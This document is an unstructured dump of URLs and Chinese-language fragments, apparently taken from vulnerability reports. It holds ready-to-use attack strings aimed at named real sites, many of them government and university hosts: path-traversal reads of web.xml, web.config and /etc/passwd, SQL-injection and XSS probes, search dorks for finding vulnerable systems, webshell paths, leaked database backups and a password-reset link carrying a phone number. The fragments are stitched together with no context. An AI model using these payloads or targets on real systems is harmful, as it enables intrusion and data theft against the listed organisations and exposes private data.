http://www.schj.gov.cn/wryjcxx/filedownload.action?inputPath=upfile/../WEB-INF/web.xml&inputName=web.xml http://www.xjmic.com/enterprisemonitor/filedownload.action?inputPath=upfile/../WEB-INF/web.xml&inputName=web.xml http://222.247.51.155:9000/filedownload.action?inputPath=upfile/../../../../../login.jsp&inputName=login.jsp http://202.136.217.188:8800/filedownload.action?inputPath=upfile/../login.jsp&inputName=login.jsp http://nmgepb.gov.cn:8088/enterprisemonitor/filedownload.action?inputPath=upfile/../login.jsp&inputName=login.jsp http://182.148.109.184/filedownload.action?inputPath=upfile/../WEB-INF/web.xml&inputName=web.xml http://www.schj.gov.cn/wryjcxx/filedownload.action?inputPath=upfile/../WEB-INF/web.xml&inputName=web.xml http://www.schj.gov.cn/wryjcxx/filedownload.action?inputPath=upfile/../login.jsp&inputName=login.jsp http://www.xjmic.com/enterprisemonitor/filedownload.action?inputPath=upfile/../WEB-INF/web.xml&inputName=web.xml http://www.xjmic.com/enterprisemonitor/filedownload.action?inputPath=upfile/../login.jsp&inputName=login.jsp http://222.247.51.155:9000/filedownload.action?inputPath=upfile/../../../../../login.jsp&inputName=login.jsp http://202.136.217.188:8800/filedownload.action?inputPath=upfile/../login.jsp&inputName=login.jsp http://nmgepb.gov.cn:8088/enterprisemonitor/filedownload.action?inputPath=upfile/../login.jsp&inputName=login.jsp http://bbs.cailele.com/ http://www.woniuad.com/cn/login_login.action http://zscq.e23.cn/ClassShow.jsp?BigClassID=2&SClassID=-1;%20waitfor%20delay%20%270:0:0%27%20--%20 http://zscq.e23.cn/ClassShow.jsp?BigClassID=2&SClassID=-1;%20waitfor%20delay%20%270:0:5%27%20--%20 http://www.juyuanmall.com/ http://www.juyuanmall.com/gw/list.jsp?cat=180存在注入漏洞 mail.jxdpf.gov.cn/为邮箱首页.点击申请注册可以顺利注册。而且弱口令密码可以注册,这使邮箱用户有被爆破密码的危险。政府GOV邮箱具有一定的权威性,一般不会对外开放注册的,可任意注册让诈骗不法分子获得更具迷惑性身份伪装,使欺诈成功率上升。 http://vrlab.sdjzu.edu.cn/aspnews/ http://event.asus.com.cn/2013/volunteer/appraiseView.asp?xjID=56 http://www.hsw.cn/adv/2006/05/07_mx/web_mengx.htm http://www.hsw.cn/adv/2006/05/07_mx/sms_mengx.htm http://dapei.mo.vancl.com/ http://dapei.mo.vancl.com/suitapp/login.jsp site:baozoumanhua.com inurl:www http://debug.baozoumanhua.com/login http://m.baozou.com/login inurl:about.asp?smallclassid http://zfbz.10.gov.cn/list.asp?bigclassid=102//test http://jc.10.gov.cn/list.asp?bigclassid=88 http://www.ycylyy.com/list.asp?bigclassid=106 http://yjj.10.gov.cn/list.asp?bigclassid=52 http://www.cni22iec.com.cn/list.asp?bigclassid=107 http://www.ylgtzy.gov.cn/list.asp?bigclassid=107 http://ylls.5210.cn/list.asp?bigclassid=97 http://www.sxylzx.com/list.asp?bigclassid=77 http://www.hbdygl.com/list.asp?bigclassid=98 http://zfbz.10.gov.cn/list.asp?bigclassid=102为例进行测试 http://www.cni22iec.com.cn/view.asp?id=2182 http://www.ycylgjj.cn/view.asp?id=1688 http://jc.10.gov.cn/view.asp?id=1480 http://www.ycylyy.com/view.asp?id=2182 http://yjj.10.gov.cn/view.asp?id=503 http://www.ylgtzy.gov.cn/view.asp?id=4205 http://ylls.5210.cn/view.asp?id=1953 http://www.sxylzx.com/view.asp?id=3485 http://www.ylljf.net/view.asp?id=656 http://www.hbdygl.com/view.asp?id=1148 http://www.cni22iec.com.cn/view.asp?id=2182对漏洞进行测试 http://zfbz.10.gov.cn/about.asp?smallclassid=186 http://jc.10.gov.cn/about.asp?smallclassid=184 http://www.cni22iec.com.cn/about.asp?smallclassid=182 http://www.ycylgjj.cn/about.asp?smallclassid=182 http://www.ycylyy.com/about.asp?smallclassid=182 http://www.ylgtzy.gov.cn/about.asp?smallclassid=182 http://ylls.5210.cn/about.asp?smallclassid=212 http://www.sxylzx.com/about.asp?smallclassid=182 http://www.ylljf.net/about.asp?smallclassid=182 http://www.hbdygl.com/about.asp?smallclassid=190 http://www.ycylyy.com/about.asp?smallclassid=182为例测试 http://q1.sto.cn/shoujireg/register注册和找回密码过程中 http://www.taozfu.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.php http://www.taozfu188.com/admin/ind_backstage.asp http://stat.letv.com/vplay/apis/playertime_detect.php?vid=null&a=1&b=1611&uuid=4f371d6b374940c0f43aac1f3d1723e8 http://tzjg.zssj.gov.cn/login/CmsSubmit.do http://www.xiangcall.com/list.action http://www.xiangcall.com:8080/jspma.jsp http://www.xiangcall.com:8080/shell.jsp http://www.xiangcall.com:8080/one8.jsp http://www.xiangcall.com/WEB-INF/classes/jdbc.properties http://sqlmap.org www.hbfcmy.com)拿到webshell之后在网站根目录写入一句话 http://demo.31390.com:8080/eLearning/user.html http://demo.31390.com:8080/eLearning/message/s800.html http://ssd3.31390.com/eLearning/user.html http://jhxx.mhedu.sh.cn/eLearning/user.html http://genomics.cafs.ac.cn/fpc/WebAGCoL/Carp/WebFcmp/ http://genomics.cafs.ac.cn/index.php?do=fbwz_del&id=84 http://genomics.cafs.ac.cn/hy.sql http://genomics.cafs.ac.cn/GeneR/WEB-INF/lib/ inurl:policylaw/policylaw.do http://www.hzxf12345.gov.cn/policylaw/policylaw.do?act=read&filePath=C:\Windows\System32\drivers\etc\hosts&fileContentType= http://218.108.102.212:1234/policylaw/policylaw.do?act=read&filePath=C:\Windows\System32\drivers\etc\hosts&fileContentType= http://xf.jianggan.gov.cn/jgxfw/policylaw/policylaw.do?act=read&filePath=c:/Windows/win.ini&fileContentType= http://122.224.136.141:3465/scwsxf/policylaw/policylaw.do?act=read&filePath=c://Windows//win.ini&fileContentType= http://122.224.76.165/xcwsxf/policylaw/policylaw.do?act=read&filePath=c://Windows//win.ini&fileContentType= http://www.72dns.com/smsadmin/Sms_Api.aspx http://moffice.wo.com.cn/news_show.php?MenuID=5&CaseID=2 http://post.10jqka.com.cn/admin?do=login http://service.tp-link.com.cn/search.html?level1=%E6%97%A0%E7%BA%BF%E4%BA%A7%E5%93%81&level2=HyFi%E6%99%BA%E8%83%BD%E6%97%A0%E7%BA%BF&product=TL-H18E%2FTL-H18R&kw=TL http://service.tp-link.com.cn/search.html?level1=%E6%97% http://sqlmap.org http://aoi.androidesk.com/)后直接在电脑端操作。 http://aoi.androidesk.com/myedit http://stock2.finance.sina.com.cn/licai/api/jsonp_v2.php/$cb/ProductRateService.getRateYear?type=AVG&seq=1&_=$rn http://card.dgpt.edu.cn/managerNManager.action http://ecard.sjtu.edu.cn/managerNManager.action http://kwzx.hbue.edu.cn/managerNManager.action http://ecard.tyut.edu.cn/managerNManager.action http://id.gzu.edu.cn/managerNManager.action http://ecard.ouc.edu.cn/managerNManager.action http://ecard.sdu.edu.cn/managerNManager.action http://ecard.jxust.cn/managerNManager.action http://card1.upc.edu.cn/managerNManager.action http://www.ecard.sdwu.edu.cn/managerNManager.action http://card.dgpt.edu.cn/manager/ http://card.dgpt.edu.cn/images/ http://card.dgpt.edu.cn/help/ http://card.dgpt.edu.cn/css/ http://card.dgpt.edu.cn/js/ http://card.dgpt.edu.cn/pages/ http://card.dgpt.edu.cn/examples/ http://card.dgpt.edu.cn/index.htm http://card.dgpt.edu.cn/application/ http://card.dgpt.edu.cn/images/face/ http://card.dgpt.edu.cn/admin/users/ http://card.dgpt.edu.cn/managerNManager.action http://www.zsbtv.com.cn/Comment/Comments4.aspx?contentid=10436 http://www.zsbtv.com.cn/Comment/Comments.aspx?contentid=10150 http://app.shudianbao.com/more?action=vipInfo&&userid=1 http://app.shudianbao.com/registe?action=resetPassword&&phone=13705287766&&pwd=111111 http://zzy.gscass.cn/sdor/login.action http://zzy.gscass.cn/sdor http://127.0.0.1/v7/cache/mysql_bak/2014-0~1.kxq/0.sql http://forum.anywlan.com/ http://www.gyport.com/ADMIN/admin.asp http://www.hljrtvu.com/NewWeb/HLJRTVUWeb/leichinews/admin/adminlogin.asp http://lib.wzmc.edu.cn/news/admin/adminlogin.asp http://zzrs.hnctcm.edu.cn/admin/admin.asp http://shehui.synu.edu.cn/admin/admin.asp http://www.cysl.gov.cn/news/admin/admin.asp http://www.jntc.nm.cn/jwz/sswhjsy/admin/admin.asp http://114.112.82.200:9001/ http://www.tjnp.com.cn/admin_login.aspx http://www.tjnp.com.cn/upload/2014-07/1.aspx http://job.hust.edu.cn/admin/doLogin.htm http://drops.wooyun.org/papers/548 http://zhongkao.haedu.gov.cn/zhongzhao/cgkdo?action=list&code=410102600142 http://mec.gdei.edu.cn/web-console/ http://v.baidu.com/#word=%bf",alert&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&oq=&f=3&rsp=&ie=utf-8 http://v.baidu.com/#word=%ff"a&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&oq=&f=3&rsp=&ie=utf-8 http://list.client.pplive.cn/v3/proxy?s=http://zt.pptv.com/clientzt/sports/ice/index.html http://www.kekenet.com/broadcast/201407/311657.shtml http://xinsheng.zfc.edu.cn/yxxt/web/zzfw_index.do http://news.xcar.com.cn/xbackend/apps/adclick/ad_hit_info/redirect.php?id=36155 http://www.jslit.com/ http://www.changyi.gov.cn:8806/zwgk/login.jsp http://www.sdsg.gov.cn:8088/zwgk/login.jsp# http://119.191.58.186:8082/zwgk/login.jsp# http://61.133.99.98:8806/zwgkxs/login.jsp http://www.belleintl.com/index.php http://www.belleintl.com/news2.php?id=49 http://mail.ahrb.com.cn/ http://wooyun.org/bugs/wooyun-2014-058462 http://mpro.caaa.cn/article.php?id=5716 http://oa.china-sss.com http://www.shangdunet.com/ http://www.kfga.gov.cn/login.jsp http://www.zkcz.gov.cn/login.jsp http://www.shilongqu.gov.cn/login.jsp http://zfxxgk.shilongqu.gov.cn:8080/zwgk/login.jsp http://www.wuzhi.gov.cn/login.jsp http://125.46.62.125:8868/zwgk/login.jsp http://www.nipcip.com/login.jsp http://www.shilongqu.gov.cn/222.jsp http://www.wuzhi.gov.cn/4444.jsp?o=vLogin http://xshxy.gxun.edu.cn/zhao/info/class.asp?id=4 http://xyh.cdu.edu.cn/schnewslist.php?id=2 http://tw.lnist.edu.cn/column.asp?id=1 http://jdqw.jiading.gov.cn http://oa.china-sss.com/defaultroot/public/edit/admin/main.jsp http://www.lib.whu.edu.cn/news/view.asp?id=2599%20and%201=1 www.shunliu.com http://drops.wooyun.org/papers/548 http://www.gntime.com/do/login.php注册一个会员。但是级别很低,足够了 http://www.intersk.com/】,是一家致力于品牌网站建设,优化推广,400电话,企业邮箱、网站应用程序开发(B/S)等互联网领先服务商。简单的来说该公司开发的一套系统虽然没有什么名字这里就以“深圳互联系统”来命名,该系统主要用于深圳市各大企业公司网站的建设,该系统存在注射漏洞和未授权的任意文件上次漏洞,可能造成极大的危害,如何识别为深圳互联系统,我们看看后台的风格: http://scm.ankai.com/login/Login.action http://scm.ankai.com/cmd.jsp?o=vLogin http://crm.haotehui.com/ http://www.9sky.com/12530/searchring.aspx?artNa http://sqlmap.org http://www.9sky.com:80/12530/default.aspx http://www.sosocha.com/data.zip http://ls.laohu.com/db/main/filter?filter=cardtype%3D3 http://sqlmap.org http://v.anhuinews.com/includes/fckeditor/editor/filemanager/upload/test.html http://v.anhuinews.com/images/stories/blog/image/template.php http://v.anhuinews.com/scan.php?action=scan http://www.midifan.com/ http://oa.epoint.com.cn/CustomerFront/FAQSystem.aspx?CategoryGuid= http://www.jyeoo.com/ http://e.easou.com/searchPro_agentArea_sqdl.html#pro_content发现的搜索 www.ereachmobile.com http://www.bjgzw.gov.cn/QtCommonAction.do?method=xxcx&type=0000004010 http://www.zhifangzi.com:28017/数据库泄露,具有读写权限。 http://vip.400cti.com.cn/登录页面管理员的密码.请问这个有用吗 http://119.7.**.***:9090/monitor/ http://119.7.**.***:9090/monitor/%5b2014-7-08%5d/015121045028-018182323298-1404765410.8436-043650.wav http://119.7.**.***:9090/monitor/[2014-7-07]/015121045028-015595397889-1404745379.8285-230259.wav http://fancyguo.com/ inurl:https https://124.238.218.84/web.zip http://i.178.com/~game.newgame.add_wl http://e.zj165.com/download.html www.xj.cn也有此问题,可能getshell,没继续试。 www.alexa.cn http://211.152.100.148/voices/download/211.152.100.148/867500000/luyin/ http://www.hrbgs.gov.cn/lck.txt http://www.eyukj.com/admin.php http://www.sibide.com/admin.php http://www.comcat.cn/admin.php http://www.sdymz.net/admin.php http://www.tjconnected.com/admin.php http://www.chinaqhd.cn http://cugnc.cug.edu.cn/cms/index.do http://www.et.zjut.edu.cn/admincp/ http://www.et.zjut.edu.cn/content/?sid=2 http://bd.generali-china.cn/jmx-console/ http://ideaclub.lenovo.com.cn/forum/home.php?mod=space&uid=656358&do=profile www.3lengjing.com) http://211.151.36.39/ http://211.151.36.37/ http://211.151.36.33/ http://qdzyfw.qingdao.gov.cn/Pages/RecruitInfo/View.aspx?Guid=1403b2e2-ac8e-41cd-a4d4-853e968aae41”存在一枚SQL注入漏洞,利用该漏洞可以获取系统权限。更重要的是青岛志愿网同C段下存在大量青岛政府网站,利用该漏洞拿到系统权限后,可以发起中间人攻击,对其他政府站点进行网页篡改、挂马、嗅探。 http://www.jiukuaiyou.com/ http://sbc.xzit.edu.cn/hxjc/DownLoad.aspx?Accessory=../web.config http://hedds.njutcm.edu.cn/DownLoad.aspx?Accessory=../web.config http://www.emcjs.org/DownLoad.aspx?Accessory=../web.config http://labyuanlin.njfu.edu.cn/DownLoad.aspx?Accessory=../web.config http://artlab.njfu.edu.cn/DownLoad.aspx?Accessory=../web.config http://xygq.njutcm.edu.cn/DownLoad.aspx?Accessory=../web.config http://bbs.kuwo.cn/forum/data/backup_140306_G3P1Gy/ inurl:funonews.ASP?ID= http://www.zg.gov.cn/photo/pic_show.aspx?pid=311 http://www.bxxy.com/sonsite/2011pingjian/pj/upload/help/js/..../a.asp http://leboapi.baidu.com/lebo/selectlink?type=getSongFileLinkWithAdv&linktype=2&songids=6281502%20%20and%201=1%23 http://leboapi.baidu.com/lebo/selectlink?type=getSongFileLinkWithAdv&linktype=2&songids=6281502%20%20and%201=2%23 www.ikuai8.com http://dev.snail.com/Site/Login.html http://ting.kekenet.com/tx/270439 http://write.kekenet.com/show_55# inurl:GZZDInfordetail.jsp?id inurl:FLGDInfordetail.jsp?id inurl:gkznInfo.jsp?depcode inurl:orgsiteInfo.jsp?orgid inurl:js_NDBGInfordetail.jsp?id http://www.tjzfxxgk.gov.cn/tjep/GZZDInfordetail.jsp?id=43 http://info.tjjn.gov.cn/GZZDInfordetail.jsp?id=17 http://xinxigk.baodi.gov.cn/GZZDInfordetail.jsp?id=10 http://gk.tjjh.gov.cn/GZZDInfordetail.jsp?id=11 http://xxgk.tjbc.cn/GZZDInfordetail.jsp?id=5 http://www.tjnh.gov.cn:7002/GZZDInfordetail.jsp?id=7 http://202.99.99.30/GZZDInfordetail.jsp?id=10 http://gk.tjhqqzf.gov.cn/GZZDInfordetail.jsp?id=5 http://zfxxgk.bh.gov.cn/GZZDInfordetail.jsp?id=9 http://221.239.20.83/GZZDInfordetail.jsp?id=9 http://218.69.96.137/GZZDInfordetail.jsp?id=2 http://gk.tjheping.gov.cn:3030/GZZDInfordetail.jsp?id=14 http://www.tjzfxxgk.gov.cn/tjep/FLGDInfordetail.jsp?id=43 http://zwgk.tjhd.gov.cn:8000/FLGDInfordetail.jsp?id=11 http://info.tjjn.gov.cn/FLGDInfordetail.jsp?id=28 http://gk.tjjh.gov.cn/FLGDInfordetail.jsp?id=29 http://www.tjnh.gov.cn:7002/FLGDInfordetail.jsp?id=14 http://gk.tjhqqzf.gov.cn/FLGDInfordetail.jsp?id=5 http://202.99.99.30/FLGDInfordetail.jsp?id=11 http://zfxxgk.bh.gov.cn/FLGDInfordetail.jsp?id=10 http://221.239.20.83/FLGDInfordetail.jsp?id=2 http://zwgk.tjhexi.gov.cn:8080/FLGDInfordetail.jsp?id=1 http://gk.tjheping.gov.cn:3030/FLGDInfordetail.jsp?id=11 http://zwgk.tjhd.gov.cn:8000/gkznInfo.jsp?depcode=BBA15M http://info.tjjn.gov.cn/gkznInfo.jsp?depcode=BOF04A http://gk.tjnk.gov.cn/gkznInfo.jsp?depcode=BDA20B http://xinxigk.baodi.gov.cn/gkznInfo.jsp?depcode=BNA05F http://gk.tjjh.gov.cn/gkznInfo.jsp?depcode=BRA19G http://gk.xq.gov.cn/gkznInfo.jsp?depcode=BJE01A http://www.tjnh.gov.cn:7002/gkznInfo.jsp?depcode=BQA07K http://xxgk.tjbc.cn/gkznInfo.jsp?depcode=BLA25I http://zwgk.tjhexi.gov.cn:8080/gkznInfo.jsp?depcode=BCE01A http://gk.tjhqqzf.gov.cn/gkznInfo.jsp?depcode=BFA02B http://202.99.99.30/gkznInfo.jsp?depcode=CBA10E http://60.28.129.212/gkznInfo.jsp?depcode=BE0000 http://61.181.146.98:7002/gkznInfo.jsp?depcode=BQA20L http://218.69.106.201:8080/gkznInfo.jsp?depcode=BCA28A http://221.239.20.83/gkznInfo.jsp?depcode=BKB23E http://gk.tjwq.gov.cn/gkznInfo.jsp?depcode=BMF25A http://218.69.96.137/gkznInfo.jsp?depcode=BMB04C http://60.30.65.156/gkznInfo.jsp?depcode=BNB05L http://gk.tjheping.gov.cn:3030/gkznInfo.jsp?depcode=BAE02A http://www.tjzfxxgk.gov.cn/tjep/orgsiteInfo.jsp?orgid=91 http://xxgk.tjbc.cn/orgsiteInfo.jsp?orgid=102 http://info.tjjn.gov.cn/js_NDBGInfordetail.jsp?id=5 http://zwgk.tjhd.gov.cn:8000/js_NDBGInfordetail.jsp?id=4 http://gk.xq.gov.cn/js_NDBGInfordetail.jsp?id=2 http://xinxigk.baodi.gov.cn/js_NDBGInfordetail.jsp?id=7 http://gk.tjjh.gov.cn/js_NDBGInfordetail.jsp?id=6 http://www.tjzfxxgk.gov.cn/tjep/js_NDBGInfordetail.jsp?id=5 http://www.tjnh.gov.cn:7002/js_NDBGInfordetail.jsp?id=13 http://xxgk.tjbc.cn/js_NDBGInfordetail.jsp?id=8 http://gk.tjhqqzf.gov.cn/js_NDBGInfordetail.jsp?id=4 http://gk.tjnk.gov.cn/js_NDBGInfordetail.jsp?id=5 http://zwgk.tjhexi.gov.cn:8080/js_NDBGInfordetail.jsp?id=2 http://202.99.99.30/js_NDBGInfordetail.jsp?id=2 http://zfxxgk.bh.gov.cn/js_NDBGInfordetail.jsp?id=4 http://221.239.20.83/js_NDBGInfordetail.jsp?id=6 http://www.yododo.com/ http://dkp.178.com/ http://dkp.178.com/?game_id=0&area=%E4%B8%80%E5%8C%BA&server=%E9%98%BF%E6%A0%BC%E6%8B%89%E7%8E%9B&gid=1&guild=niubi&_app=dkp&_controller=search&_action=search http://v.baidu.com/commonapi/topic/?topicid=11 http://v.baidu.com/commonapi/topic/?topicid=11 http://crazyenglish.com/ http://www.wangdaizhibao.com http://ccav.com/LC3Aro?1405559322 www.jzjjjc.gov.cn http://www.jzjjjc.gov.cn/hdjl/forum.php http://www.jzjjjc.gov.cn/phpinfo.php http://112.65.221.82/ http://www.ziroom.com/?_p=sign&_a=weakpassowrd&step=1&type=forgetpassword http://www.ziroom.com/index.php?_p=api&_a=customer&type=search&login_name=188xxxxxxxx http://pay.anzhi.com/web/recharge http://218.241.83.21/zhihui/ http://netpay.uestc.edu.cn/ http://netpay.uestc.edu.cn/LoginAction.action{struts2漏洞} http://shurufa.baidu.com/?act=dict.checkname http://ioa.rising.com.cn/ http://sports.chosun.com/cartoon/content.htm?title=ghost http://economyplus.chosun.com/special/special_view_star.php?atCode=2300 www.chinafpn.com www.youxiandai.net www.youxiandai.cn www.youxiandai.com.cn http://www.chinafpn.com:80/web/productlist.action http://www.youxiandai.cn/web/poffertbiamountNew.action http://www.chinafpn.com/uploads/contracts/20140030007.pdf http://www.chinafpn.com/uploads/contracts/2014004B0006.pdf http://flashcms.10jqka.com.cn/default/login/ http://me.hbjt.gov.cn/fb/config.js www.sph.com.cn/Office/OfficeA.aspx?catid=4&D=&outID=47和www.sph.com.cn/Person/PersonTD.aspx?CID=1 http://dealer.auto.sohu.com/auth/login.action http://dealer.auto.sohu.com/reg/go_to_register.at http://dealer.auto.sohu.com/bat69210/index.html http://oa.mendale.com:89/m1/login.do https://www.google.com.hk/search?q=allintext:+Company+Logo+%E5%B8%90%E5%8F%B7+%E5%AF%86%E7%A0%81+%E8%AF%AD%E8%A8%80+%E4%B8%AD%E6%96%87+%E8%8B%B1%E6%96%87+%E5%AD%97%E4%BD%93+%E5%A4%A7+%E4%B8%AD+%E5%B0%8F+%E8%AE%B0%E4%BD%8F%E5%AF%86%E7%A0%81+Company+Logo+%E5%B8%90%E5%8F%B7+%E5%AF%86%E7%A0%81+%E8%AF%AD%E8%A8%80+%E4%B8%AD%E6%96%87+%E8%8B%B1%E6%96%87+%E5%AD%97%E4%BD%93+%E5%A4%A7+%E4%B8%AD+%E5%B0%8F+%E8%AE%B0%E4%BD%8F%E5%AF%86%E7%A0%81&lr=&safe=strict&as_qdr=all&ei=pvHHU7uWFMPn8AWW-oGAAw&start=0&sa=N&filter=0&biw=1366&bih=611 http://www.lntymj.com:8080/m1/login.do http://218.3.160.242:8080/m1/login.do http://218.3.160.242:8080/m1/login.do http://www.lntymj.com:8080/m1/login.do http://oa.cccgroup.com.cn:88/m1/login.do http://m.liando.cn/m1/login.do http://119.60.10.146:89/ http://www.henly.com.cn:89/m1/login.do http://59.55.142.211:8091/m1/login.do http://121.28.82.250:89/login.do http://60.208.78.250:801/m1/login.do com:89/m1/login.do com:89/m1/login.do portal.lanju.cn/m1/login.do http://m.isimcere.com/m1/login.do http://218.3.160.242:8080/m1/login.do http://www.simcere.net/m1/login.do http://ad.easou.com/admin/toLogin.admin http://pvlog.moviebox.baofeng.com/phpinfo.php http://www.scdrc.gov.cn/system.htm这个里面的这些管理系统某些存在struts2远程执行漏洞 http://118.122.113.71:8780/login.do http://118.122.113.83:8380/shsy/login.do http://118.122.113.76:8180/jnjp/login.do http://www.ebdoor.com/ http://huizhou.ganji.com/fuwu_dian/2658801/liangyoulei/ http://m.okgj.com/ http://42.96.185.111:8090/worldcup/ http://v.ku6.com/tiand1 www.web029.com.cn http://oa.zoomla.cn/ http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 http://demo.zoomla.cn http://demo.zoomla.cn/admin/login.aspx http://demo.zoomla.cn/Admin/I/Template/TemplateEdit.aspx?setTemplate=%2fTemplate%2fV3&filepath=../../../config/AppSettings.config http://demo.zoomla.cn/install即可重装(测试成功) http://demo.zoomla.cn/Admin/I/Template/TemplateManage.aspx?setTemplate=%2f&Dir= http://demo.zoomla.cn/Admin/I/Template/TemplateEdit.aspx?setTemplate=%2fTemplate%2fV3&filepath=../../../config/ConnectionStrings.config http://183.61.119.56/index.php inurl:zsdt_cont.asp?id= https://www.google.com.hk/webhp?hl=zh-CN&sourceid=cnhp#btnK=Google+%E6%90%9C%E7%B4%A2&hl=zh-CN&newwindow=1&q=inurl:zsdt_cont.asp%3Fid%3D&safe=strict http://7.114ok.cc/%E4%BA%AC%E7%91%9E%E6%81%A9%E8%AF%AD%E8%A8%80%E5%9F%B9%E8%AE%AD%E7%BD%91%E6%BA%90%E7%A0%81/zsdt_cont.asp?id=267 http://www.scfabang.com/zsdt_cont.asp?id=316 http://www.xmyinyue.com/zsdt_cont.asp?id=452 http://www.swjtu-edu.cn/zsdt_cont.asp?id=363 http://www.huitongxx.com/kjyypx/zsdt_cont.asp?id=289 http://qy.qidox.cn/zsdt_cont.asp?id=1140 http://www.chinaface.com/user/forget?step=reset&key=xxxxxx http://www.dt.gov.cn:8080/search.php http://sqlmap.org inurl:newsinfo.asp?id= https://www.google.com.hk/webhp?hl=zh-CN&sourceid=cnhp#hl=zh-CN&newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81:%E5%85%84%E5%BC%9F%E7%BD%91%E7%BB%9C+inurl:newsinfo.asp%3Fid%3D&safe=strict http://www.xardsoft.com/newsinfo.asp?id=34 http://www.c-wst.com/newsinfo.asp?id=547 http://www.kondarlfeed.com/newsinfo.asp?id=630 http://www.wnsdeyy.com/newsinfo.asp?id=170 http://jy.sxri.net/newsinfo.asp?id=509 http://www.henryfloor.com/newsinfo.asp?id=17 http://www.asiatravelsa.com/newsinfo.asp?id=562 http://www.liyutian.com/newsinfo.asp?id=479 http://www.fmvcc.com/newsinfo.asp?id=45&sjid= http://www.bio-zt.com/newsinfo.asp?id=172 http://www.xajjzh.com/newsinfo.asp?id=397 http://www.gzswjst.com/DataBase/DB.mdb http://www.gzswjst.com/Login.Asp http://www.gzswjst.com/admin/login.asp http://www.gzswjst.com/GuestBook/ http://www.gzswjst.com/pass.asp http://bbs.chosun.com/bbs.message.view.screen?bbs_id=201 http://www.baidu.com/s?tn=monline_5_dg&f=8&wd=%E6%95%99%E5%8A%A1%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%BC%BA%E6%99%BA%E7%A7%91%E6%8A%80%20%E7%89%88%E6%9D%83&ie=utf-8&oq=%E6%95%99%E5%8A%A1%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%BC%BA%E6%99%BA%E7%A7%91%E6%8A%80%20%E7%89%88%E6%9D%83&bs=%E6%95%99%E5%8A%A1%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81&rsv_bp=1&inputT=19786&rsv_sug3=61&rsv_sug4=15884&rsv_sug1=43&rsv_sug2=0&pn=10 http://jwgl.cqeec.com/jiaowu_2008/ http://114.255.66.248/jiaowu/ http://121.28.180.234/jiaowu/ http://219.148.49.53/jiaowu/ http://jiaowu.hustwenhua.net/ http://211.81.25.6/jiaowu/ http://218.204.113.170/jiaowu/ http://221.2.229.222/jiaowu/ http://59.173.249.245/wljiaowu/ inurl:product.asp?id= https://www.google.com.hk/webhp?hl=zh-CN&sourceid=cnhp#hl=zh-CN&newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81:%E7%BB%B4%E8%81%94%E7%A7%91%E6%8A%80+inurl:product.asp%3Fid%3D&safe=strict http://www.conplastech.com/product.asp?pid=3 http://www.dyjzj.com/product.asp?id=710 http://www.odsm.cn/product.asp?id=635 http://www.mekolift.com/product.asp?id=907 http://www.sutaiqiye.com/product.asp?id=470 http://www.kxjx.com.cn/product.asp?id=622 http://www.jlzq.com/product.asp?id=3 http://www.fenghuajx.com/product.asp?id=461 http://www.wjjnzp.com/product.asp?id=554 http://www.wjqxbs.com/product.asp?id=480 http://www.wanlong-china.com/product.asp?id=12 http://www.klesjj.com/product.asp?id=33 http://szyhdr.com/product.asp?id=74 http://www.youte.cn/product.asp?id=35 http://www.kainuote.com/product.asp?id=24 http://www.ks-km.com/product.asp?id=16 http://www.chinacreator.com/】开发的系统专用于湖南省各个政府机构使用,其中某个投票处存在SQL注射漏洞,可获取任意数据。 http://security.ctocio.com.cn/145/12469145.shtml这个就是了 http://odo.jd.com/payment/paid.action?callback=jsonp%3Cimg%20src=1%20onerror=alert%281%29%3E&_=1405693358313&json=382637832a&r=0.19931061877079614 http://jr.jd.com/async/trade/info?callback=j%3Cimg%20src=1%20onerror=alert%28%27xss%27%29%3E&_=1405691146386 http://hoau.sungodo.cn/global_Login.do;jsessionid=3CFD809A639B513D5D4E9591EDEFCDEB http://eps.usas.com:208/global_Login.do;jsessionid=FECE4411D6757B6C11681E52AB7A8265 http://www.crpcecg.com:8070/global_Login.do;jsessionid=52744BF9F2B100FAE65ADBC7588E43DE http://korrun.cn/global_Login.do;jsessionid=CF7CD72EC7AB179108C0CAFF3701EB8C http://www.szztej.com/global_Login.do;jsessionid=43CD594D60D010FE8C80251A9A63A0FC http://bid.lyxztb.gov.cn:8080/global_Login.do;jsessionid=DBE91362886979C6FE620CD70D906C74 http://www.sh5mcc.net/global_Login.do http://caigou.mitgroup.com.cn:808/global_Login.do http://bid.lyxztb.gov.cn:8080/global_Login.do http://hoau.sungodo.cn/global_Login.do http://www.hh010.com/safe/html/33-1/1470.htm这就是漏洞了 inurl:NewsView.asp?ID= http://www.bbjyt.net/) http://122.224.169.190:10080/JSSMS/ http://202.108.199.10/ http://mail.nmefc.gov.cn: inurl:/News.shtml?ide= http://txjy.dg.gov.cn/adminroot/login.htm http://txjy.dg.gov.cn/adminroot/common/downLoadFile.jsp?filepath=adminroot/default.jsp&filename=None http://txjy.dg.gov.cn/adminroot/common/downLoadFile.jsp?filepath=/WEB-INF/web.xml&filename=None http://www.xxx.com/news.asp?id=100 http://www.ltall.net/ http://uswebmail.mail.126.com/appcenter/ftentry.do?sid=XXXXXXXXXXX&func=mapp:sequential典型的XXE注入,POST参数var http://www.snciq.gov.cn:6198/car/common/file8.jsp http://221.176.1.140:8080/showChart.jsp?filename=.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././../etc/passwd http://211.137.34.226/showChart.jsp?filename=.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././../etc/passwd http://zabbix.uzai.com/ www.msdlr.gov.cn)存在XSS漏洞!弱口令!等多处漏洞! http://www.msdlr.gov.cn/user/User_Login.asp http://www.dapu.com/passport-lost-2-EA5D9AF19D0101D010C9386569577D48.html https://vpn.ruc.edu.cn https://vpn.ruc.edu.cn/,DanaInfo=www.cnki.net+ 